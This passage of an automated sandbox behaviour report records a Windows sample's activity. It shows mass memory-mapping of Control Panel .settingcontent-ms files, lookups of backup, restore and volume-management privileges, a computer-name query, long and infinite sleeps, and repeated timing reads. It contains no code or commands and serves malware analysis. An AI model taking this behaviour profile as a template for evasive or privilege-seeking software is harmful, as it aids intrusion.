Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D825FEC7-DA3D-456A-BEF2-20F07BA0449E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d9ef8727-cac2-4e60-809e-86f80a666c91}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DD338333-7000-45CC-A84D-64680D6E683D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1664 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{E9C71548-B580-43B2-ACDB-1BA924002754}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EBEC2956-F512-474D-8631-9E753CC40653}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ecdb0924-4208-451e-8ee0-373c0956de16}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ED0FF627-BFD1-4F68-9A74-974E73F41A3A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{ed834ed6-4b5a-4bfe-8f11-a626dcb6a921}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EE423D17-7ED8-4B33-9555-C23DEEAFB4B6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f2ddfc82-8f12-4cdd-b7dc-d4fe1425aa4d}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F2E71049-6F88-4A3B-9475-5A2B40B36092}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F3FD1F8E-B34A-49AE-95B9-5DBEAB5BFB49}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f56fbb39-e6d9-4b6d-9c29-ae82cff2925f}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f6b6e965-e9b2-444b-9286-10c9152edbc5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{f82df8f7-8b9f-442e-a48c-818ea735ff9b}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1664 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\ControlPanel.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\ControlPanel.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1520 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\CortanaSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\CortanaSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1552 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_0_FlashPlayerCPLApp.cpl.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{025A5937-A6BE-4686-A844-36FE4BEC8B6D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
For performance reasons, the remaining 1011 entries are omitted.
The remaining entries can be found in glog.xml.
User (3)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeBackupPrivilege, luid = 17 True 1
Fn
Lookup Privilege privilege = SeRestorePrivilege, luid = 18 True 1
Fn
Lookup Privilege privilege = SeManageVolumePrivilege, luid = 28 True 1
Fn
System (1010)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 1
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 4
Fn
Sleep duration = -1 (infinite) False 3
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) False 1
Fn
Get Time type = System Time, time = 2019-07-22 11:32:40 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 13409393340 True 1
Fn
Get Time type = Performance Ctr, time = 13410168847 True 1
Fn
Get Time type = Performance Ctr, time = 13422410696 True 1
Fn
Get Time type = Performance Ctr, time = 13422555650 True 1
Fn
Get Time type = Performance Ctr, time = 13446247946 True 1
Fn
Get Time type = Performance Ctr, time = 13447093591 True 1
Fn
Get Time type = Performance Ctr, time = 13491929971 True 1
Fn
Get Time type = Performance Ctr, time = 13504505063 True 1
Fn
Get Time type = Performance Ctr, time = 13517237254 True 1
Fn
Get Time type = Performance Ctr, time = 13549081840 True 1
Fn
Get Time type = Performance Ctr, time = 13550639781 True 1
Fn
Get Time type = Performance Ctr, time = 13550709128 True 1
Fn
Get Time type = Performance Ctr, time = 13552349373 True 1
Fn
Get Time type = Performance Ctr, time = 13557421220 True 1
Fn
Get Time type = Performance Ctr, time = 13560780892 True 1
Fn
Get Time type = Performance Ctr, time = 13561674579 True 1
Fn
Get Time type = Performance Ctr, time = 13561848229 True 1
Fn
Get Time type = Performance Ctr, time = 13589550290 True 1
Fn
Get Time type = Performance Ctr, time = 13591838249 True 1
Fn
Get Time type = Performance Ctr, time = 13630410813 True 1
Fn
Get Time type = Performance Ctr, time = 13630955566 True 1
Fn
Get Time type = Performance Ctr, time = 13640353864 True 1
Fn
Get Time type = Performance Ctr, time = 13640640281 True 1
Fn
Get Time type = Performance Ctr, time = 13641755727 True 1
Fn
Get Time type = Performance Ctr, time = 13641999413 True 1
Fn
Get Time type = Performance Ctr, time = 13642989222 True 1
Fn
Get Time type = Performance Ctr, time = 13646316859 True 1
Fn
Get Time type = Performance Ctr, time = 13647628785 True 1
Fn
Get Time type = Performance Ctr, time = 13647829304 True 1
Fn
Get Time type = Performance Ctr, time = 13683654082 True 1
Fn
Get Time type = Performance Ctr, time = 13686768905 True 1
Fn
Get Time type = Performance Ctr, time = 13735867474 True 1
Fn
Get Time type = Performance Ctr, time = 13737337508 True 1
Fn
Get Time type = Performance Ctr, time = 13772358407 True 1
Fn
Get Time type = Performance Ctr, time = 13772985894 True 1
Fn
Get Time type = Performance Ctr, time = 13773233536 True 1
Fn
Get Time type = Performance Ctr, time = 13775686614 True 1
Fn
Get Time type = Performance Ctr, time = 13778153620 True 1
Fn
Get Time type = Performance Ctr, time = 13787947575 True 1
Fn
